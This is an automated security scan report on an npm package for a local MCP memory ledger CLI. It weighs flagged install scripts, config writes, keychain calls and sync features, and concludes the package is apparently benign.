AI Security Review
scanned 3d ago · by lpm-firewall-aiNo confirmed malicious attack surface was established. Risky primitives are present but align with a local MCP ledger CLI that registers user-selected clients and optionally syncs encrypted events.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install runs postinstall; user-invoked CLI commands activate config writes, local server, sync, pairing, or keychain operations.
Impact
Install may rebuild better-sqlite3; explicit commands may modify user MCP configs, local ledger files, keychain entries, or sync encrypted ledger data to configured endpoint.
Mechanism
native dependency rebuild plus explicit MCP/local-ledger management
Rationale
Static inspection found a CLI for local MCP memory with install-time native rebuild and user-invoked config/keychain/sync features, but no concrete unconsented exfiltration or control-surface hijack. Scanner lifecycle and network findings are explained by package-aligned better-sqlite3 rebuild, localhost MCP transport, and user-configured sync.
Evidence
package.jsondist/index.jsdist/adapters/terminal/codex.jsdist/adapters/terminal/shared.jsdist/sync.jsdist/transport.jsdist/keychain.jsnode_modules/better-sqlite3/buildnode_modules/usrcp-local/node_modules/better-sqlite3/buildnode_modules/usrcp-stream/node_modules/better-sqlite3/build~/.usrcp/**~/.codex/config.toml~/.claude.json~/.cursor/mcp.json~/.continue/config.json
Network endpoints2
127.0.0.1:<port>/mcpuser-configured cloud_endpoint
Decision evidence
public snapshotAI called this Clean at 86.0% confidence as Benign with medium false-positive risk.
Evidence for block
- package.json defines postinstall that deletes better-sqlite3 build dirs then runs npm rebuild better-sqlite3.
- dist/index.js writes MCP client config files during explicit init/adapter commands.
- dist/keychain.js uses child_process spawnSync for OS keychain commands.
- dist/sync.js can push/pull encrypted ledger events to user-configured cloud_endpoint.
Evidence against
- Postinstall is limited to better-sqlite3 native rebuild paths and does not harvest data or contact a hardcoded endpoint.
- Agent config writes are package-aligned MCP registration and require user-invoked init/adapter setup commands.
- Network sync requires cloud_endpoint configured by the user; no fixed exfiltration host found.
- Passphrase/env handling is for local ledger unlock and deletes USRCP_PASSPHRASE after reading.
- No install-time credential collection, persistence beyond intended configs, or hidden payload loading found.
Behavioral surface
ChildProcessCryptoDynamicRequireEnvironmentVarsFilesystemNetwork
HighEntropyStringsUrlStrings
Source & flagged code
3 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node -e "const fs=require(\"fs\"); for (const p of [\"node_modules/better-sqlite3/build\",\"node_modules/usrcp-local/node_modules/better-sqlite3/build\",\"node_modules/usrcp-stream...
Critical
Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.
package.jsonView on unpkg•scripts.postinstall = node -e "const fs=require(\"fs\"); for (const p of [\"node_modules/better-sqlite3/build\",\"node_modules/usrcp-local/node_modules/better-sqlite3/build\",\"node_modules/usrcp-stream...
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkgdist/server.jsView file
4exports.createServer = createServer;
L5: const mcp_js_1 = require("@[redacted].js");
L6: const zod_1 = require("zod");
Medium
Dynamic Require
Package source references dynamic require/import behavior.
dist/server.jsView on unpkg · L4Findings
1 Critical1 High4 Medium4 Low
CriticalRed Install Lifecycle Scriptpackage.json
HighInstall Time Lifecycle Scriptspackage.json
MediumDynamic Requiredist/server.js
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings